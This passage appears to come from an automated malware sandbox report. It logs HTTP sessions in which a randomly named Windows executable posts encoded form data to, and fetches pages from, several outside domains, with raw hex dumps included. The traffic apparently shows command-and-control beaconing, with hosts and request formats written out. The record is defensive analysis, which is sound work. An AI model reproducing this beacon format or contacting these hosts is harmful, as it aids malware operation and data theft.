                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 6, 2024 10:07:11.088732958 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmE0YjRjOGQtNDMxOS00OWIzLTk5YjYtN2MzMjg0ZTU3YTgzIiwicGFnZV90aW1lIjoxNzMzNDc2MD


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.650035199.59.243.227805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:12.651443958 CET598OUTGET /wvsm/?T2M=Y0Z0G&KxZ=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2oBm3vCtx6xeHagKgyNNQL6/tdUVValn9agt9lf/uYkxXHUES57U= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:07:13.738337994 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:13 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1502
                                                                    x-request-id: 0961176a-5487-4171-8591-ac66359b926d
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Pjz+OAKG5+HYjQ3CkzEmidnvmzTa1uSo7Ro0YRgC9eT4etfNNHOHX9a+6ztP6z+/EMaRuq5+S6jB+f9+FkJaOg==
                                                                    set-cookie: parking_session=0961176a-5487-4171-8591-ac66359b926d; expires=Fri, 06 Dec 2024 09:22:13 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 6a 7a 2b 4f 41 4b 47 35 2b 48 59 6a 51 33 43 6b 7a 45 6d 69 64 6e 76 6d 7a 54 61 31 75 53 6f 37 52 6f 30 59 52 67 43 39 65 54 34 65 74 66 4e 4e 48 4f 48 58 39 61 2b 36 7a 74 50 36 7a 2b 2f 45 4d 61 52 75 71 35 2b 53 36 6a 42 2b 66 39 2b 46 6b 4a 61 4f 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Pjz+OAKG5+HYjQ3CkzEmidnvmzTa1uSo7Ro0YRgC9eT4etfNNHOHX9a+6ztP6z+/EMaRuq5+S6jB+f9+FkJaOg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 6, 2024 10:07:13.738439083 CET955INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDk2MTE3NmEtNTQ4Ny00MTcxLTg1OTEtYWM2NjM1OWI5MjZkIiwicGFnZV90aW1lIjoxNzMzNDc2MD


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.650036172.67.178.93805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:19.381354094 CET851OUTPOST /0pqe/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.mffnow.info
                                                                    Referer: http://www.mffnow.info/0pqe/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 65 72 33 70 43 67 4d 34 72 78 71 71 6d 73 52 49 2f 59 75 77 65 44 62 37 72 5a 47 34 41 32 65 7a 42 4e 73 4e 36 33 43 4c 30 65 35 59 39 45 64 75 55 5a 6d 74 4c 6b 44 69 74 31 41 52 4d 61 52 41 76 50 44 33 4e 52 54 69 5a 6e 4b 61 50 51 34 50 73 49 72 4c 33 70 39 71 67 61 7a 30 43 49 74 44 7a 52 76 61 4e 64 43 45 46 33 61 6e 73 58 76 6b 62 46 79 47 53 49 5a 74 66 38 53 57 71 4b 4d 6b 37 4c 49 79 69 30 47 61 71 49 67 77 62 6b 65 62 2b 75 62 52 68 59 63 2b 6a 33 2b 2b 6f 37 66 79 6a 4d 70 78 72 6b 49 58 2b 4c 37 4b 74 64 39 43 45 2b 43 73 37 38 62 65 66 43 58 74 4f 6f 54 6f
                                                                    Data Ascii: KxZ=XLwieY+at8m7er3pCgM4rxqqmsRI/YuweDb7rZG4A2ezBNsN63CL0e5Y9EduUZmtLkDit1ARMaRAvPD3NRTiZnKaPQ4PsIrL3p9qgaz0CItDzRvaNdCEF3ansXvkbFyGSIZtf8SWqKMk7LIyi0GaqIgwbkeb+ubRhYc+j3++o7fyjMpxrkIX+L7Ktd9CE+Cs78befCXtOoTo


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.650037172.67.178.93805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:22.047568083 CET875OUTPOST /0pqe/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.mffnow.info
                                                                    Referer: http://www.mffnow.info/0pqe/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 66 4c 6e 70 52 52 4d 34 6a 78 71 72 2f 63 52 49 32 34 75 38 65 44 48 37 72 59 79 6f 41 44 32 7a 50 50 6b 4e 31 53 2b 4c 34 2b 35 59 33 6b 64 76 4a 70 6d 32 4c 6b 4f 64 74 31 38 52 4d 5a 74 41 76 4c 48 33 4d 69 72 6a 59 33 4b 50 4a 51 34 42 6a 6f 72 4c 33 70 39 71 67 61 33 4b 43 49 46 44 7a 69 33 61 4e 38 43 46 5a 6e 61 6b 6c 33 76 6b 4e 31 79 4b 53 49 5a 50 66 39 4f 6f 71 49 30 6b 37 4c 34 79 69 67 71 64 78 59 68 35 45 30 66 34 2f 2b 36 4b 6e 6f 52 78 6a 42 2b 2b 2f 35 2f 69 72 61 30 72 33 58 49 30 73 62 62 49 74 66 6c 77 45 65 43 47 35 38 6a 65 4e 56 62 4b 42 63 32 4c 31 78 32 36 65 6e 46 73 73 72 31 6c 37 38 66 70 59 78 2b 76 51 41 3d 3d
                                                                    Data Ascii: KxZ=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoAD2zPPkN1S+L4+5Y3kdvJpm2LkOdt18RMZtAvLH3MirjY3KPJQ4BjorL3p9qga3KCIFDzi3aN8CFZnakl3vkN1yKSIZPf9OoqI0k7L4yigqdxYh5E0f4/+6KnoRxjB++/5/ira0r3XI0sbbItflwEeCG58jeNVbKBc2L1x26enFssr1l78fpYx+vQA==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.650038172.67.178.93805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:24.704016924 CET1888OUTPOST /0pqe/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.mffnow.info
                                                                    Referer: http://www.mffnow.info/0pqe/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 66 4c 6e 70 52 52 4d 34 6a 78 71 72 2f 63 52 49 32 34 75 38 65 44 48 37 72 59 79 6f 41 44 75 7a 50 36 77 4e 30 78 57 4c 35 2b 35 59 78 55 64 71 4a 70 6e 30 4c 6b 57 5a 74 31 78 6b 4d 66 68 41 67 49 50 33 59 44 72 6a 57 33 4b 50 4c 51 34 41 73 49 71 52 33 70 74 55 67 61 48 4b 43 49 46 44 7a 6a 48 61 4c 74 43 46 62 6e 61 6e 73 58 76 6f 62 46 79 75 53 49 42 31 66 39 4b 34 74 38 41 6b 36 76 55 79 6a 54 53 64 39 59 68 33 46 30 66 65 2f 2b 32 76 6e 6f 4e 62 6a 42 6a 62 2f 36 6a 69 6f 75 31 78 72 32 45 4c 33 71 4c 48 39 74 4d 55 4d 6f 43 73 78 65 6a 43 43 54 72 68 4a 75 6d 2f 75 46 2b 56 58 6c 38 65 6c 49 30 4b 34 6f 6e 38 64 53 66 55 41 66 59 31 36 59 74 4d 32 54 69 44 4f 43 30 67 35 69 66 4c 78 4e 73 4b 4b 76 77 56 70 52 43 70 41 58 6f 55 75 4f 65 32 70 51 72 7a 6a 6b 61 75 34 35 51 72 58 37 74 6d 4d 65 57 56 53 78 38 54 68 68 36 6e 74 2b 30 37 4e 6e 64 31 42 62 6a 4c 4c 73 32 63 37 46 6a 36 66 37 78 2f 71 44 59 61 41 38 68 58 69 61 77 65 33 4a 31 4d 46 56 [TRUNCATED]
                                                                    Data Ascii: KxZ=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoADuzP6wN0xWL5+5YxUdqJpn0LkWZt1xkMfhAgIP3YDrjW3KPLQ4AsIqR3ptUgaHKCIFDzjHaLtCFbnansXvobFyuSIB1f9K4t8Ak6vUyjTSd9Yh3F0fe/+2vnoNbjBjb/6jiou1xr2EL3qLH9tMUMoCsxejCCTrhJum/uF+VXl8elI0K4on8dSfUAfY16YtM2TiDOC0g5ifLxNsKKvwVpRCpAXoUuOe2pQrzjkau45QrX7tmMeWVSx8Thh6nt+07Nnd1BbjLLs2c7Fj6f7x/qDYaA8hXiawe3J1MFVKtPRXTSnWZd5ZvWvUCktAtuz8HjkJQWMFaWi8tlL7brX+syX871ga6ZqPFIsUvDO5utMREFU2bR02HqKyYsymmopAFb8rPRmN36q2uM22jbacILdoq+V7quKpsvzMh60Yo7k0nNj5SI2KsaOB8BmhvAAO2XDvcphXS8EIsncDcev2K0YWLv5lqW2cdxLQ6aXVQYtZHOA4Yg7utlXi6NLjT8Ia4tTriMkmq9VZDIMJ+JFwHUYA/CTY2nIReXHNLy7LEv5orIc3fREC/CBv1H38rnLxtaHqGdnZxZx5/Qvk2oLA5/lo9S4Gb5uVtczu8l1oMv1N84CEgcBepiWZAGmj04DzKt38cHTb+9A3enEgp0nMkxHDlWslW1KB7RR8QKuLr/F8Z79asUzZEqoem+gyLPOhFasMqwziusiWpF6CJSLp+5ZNpA8BtEJeHhjnjfQfA1wLs+ESGAaWd8p2JJuwraIsNz6mODWJB+DJ9fMNG/grcoWOo2dXoBhvQhWQwVUh+1TwSZz8jcpM397r4CjPRnjth3u1RhErrjrNLI5TCOKa1QfRX0S2HjeL+wu2NX1P59q+Rhq1NLU0wWCy+glEsi4beVMawGX3dNLN6kn7VSq+F5mQT4HYDJ/BYaZD/xftSrFRHA3ngJs7JGuNfuvmOU1qbWDtD4Q4e [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.650039172.67.178.93805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:27.356547117 CET591OUTGET /0pqe/?KxZ=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywUHb6Ky4Osqfr3aB0kL6LN4sT6D7TOK7CTnegghrlX225G7BgQJc=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:07:29.653884888 CET754INHTTP/1.1 567 unknown
                                                                    Date: Fri, 06 Dec 2024 09:07:29 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAlKFIlGxR2a6e6HS%2FpmL9vNybpdZKBcXY95ZWGf2%2F4%2FOn4CvWf23dz0g9d%2BHlXjGtwjS1FQDQNp5W1QInOrwNsp04hVhal2IH79ggofvw7U8TGK7OOpZ3Lu2LVu0o%2BUm30%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb2035bebc42ab-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1876&rtt_var=938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.650040172.67.192.207805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:35.140233040 CET881OUTPOST /yy0e/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.3kw40881107247y.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.3kw40881107247y.click
                                                                    Referer: http://www.3kw40881107247y.click/yy0e/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 6d 6f 62 68 2b 6e 4c 79 31 4c 64 4a 38 30 36 32 55 76 44 35 51 6b 7a 66 56 61 66 55 4d 59 4f 6c 6c 61 41 73 4f 62 62 76 56 6f 71 42 78 59 42 4c 72 7a 68 44 58 38 67 68 42 34 59 4b 36 55 33 53 59 50 71 76 35 33 59 6e 65 56 2f 59 2f 78 78 77 38 7a 74 56 69 76 32 64 6c 44 44 32 37 36 6f 4b 63 54 2f 4a 47 38 43 45 57 43 38 51 41 66 7a 6e 54 5a 78 51 6e 55 39 35 30 62 5a 4a 4b 58 65 39 4c 4c 47 69 53 4e 47 43 4d 42 62 2f 64 41 7a 71 52 6d 56 61 74 6f 53 76 4f 46 71 38 4e 6e 74 67 5a 54 6c 49 6d 61 38 68 58 63 52 6a 49 2f 42 39 33 61 2f 4f 53 69 45 45 51 58 6c 78 6e 46 58 74 74 48 6c 64 6a 43 4f 34 69 34 70 74
                                                                    Data Ascii: KxZ=mobh+nLy1LdJ8062UvD5QkzfVafUMYOllaAsObbvVoqBxYBLrzhDX8ghB4YK6U3SYPqv53YneV/Y/xxw8ztViv2dlDD276oKcT/JG8CEWC8QAfznTZxQnU950bZJKXe9LLGiSNGCMBb/dAzqRmVatoSvOFq8NntgZTlIma8hXcRjI/B93a/OSiEEQXlxnFXttHldjCO4i4pt
                                                                    Dec 6, 2024 10:07:36.228521109 CET978INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:07:36 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rK8BUbrzb1SFW40gXkWsE2SjUE3Qf3e157hApvmONvKoMcgP9T%2FgdF%2BpyJe9NklnKusebH8fQRImm85ut3pRFgw76lL0yuz5auTJfSZ22FPbSS1iAwFhxBB4RKJmtbdWu7N7z2Wi2SBbLCwo"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb2066480442d7-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=930&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=881&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.650041172.67.192.207805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:07:37.799776077 CET905OUTPOST /yy0e/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.3kw40881107247y.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.3kw40881107247y.click
                                                                    Referer: http://www.3kw40881107247y.click/yy0e/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 6d 6f 62 68 2b 6e 4c 79 31 4c 64 4a 74 6c 4b 32 57 4f 44 35 58 45 7a 63 52 71 66 55 58 6f 4f 68 6c 61 63 73 4f 61 66 47 56 61 2b 42 78 35 52 4c 73 33 4e 44 55 38 67 68 4f 59 59 44 2b 55 33 5a 59 50 6d 52 35 7a 59 6e 65 55 66 59 2f 77 42 77 38 43 74 57 6a 2f 32 66 6a 44 44 30 6b 4b 6f 4b 63 54 2f 4a 47 2f 2f 68 57 47 51 51 41 72 50 6e 42 6f 78 52 74 30 39 36 78 62 5a 4a 4f 58 65 48 4c 4c 47 51 53 4f 44 6c 4d 44 7a 2f 64 45 6a 71 53 33 56 56 30 34 53 68 52 56 72 43 4e 33 6f 51 41 68 51 34 34 5a 51 36 44 2f 4e 54 45 70 63 6e 72 70 2f 74 41 79 6b 47 51 56 39 44 6e 6c 58 48 76 48 64 64 78 56 43 66 74 4d 4d 4f 6b 51 62 6e 37 33 47 56 4d 48 77 57 66 38 6f 53 4b 6d 30 72 36 77 3d 3d
                                                                    Data Ascii: KxZ=mobh+nLy1LdJtlK2WOD5XEzcRqfUXoOhlacsOafGVa+Bx5RLs3NDU8ghOYYD+U3ZYPmR5zYneUfY/wBw8CtWj/2fjDD0kKoKcT/JG//hWGQQArPnBoxRt096xbZJOXeHLLGQSODlMDz/dEjqS3VV04ShRVrCN3oQAhQ44ZQ6D/NTEpcnrp/tAykGQV9DnlXHvHddxVCftMMOkQbn73GVMHwWf8oSKm0r6w==
                                                                    Dec 6, 2024 10:07:38.894279003 CET976INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:07:38 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmwbRBaAFWGVZYx9Q6BWA0PYMrYO97fBtKTafVdPpZAaLEaigdIk9LF71w%2FmHUDWm6Ok1W023j3wqb73dX3qD1On28h18CwTPeTItKwYX4IRkMHYl4eMTiaSMq7KKKME04Li3b71qsyLdOFm"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb2076f9b0c333-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=905&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:04:04:30
                                                                    Start date:06/12/2024
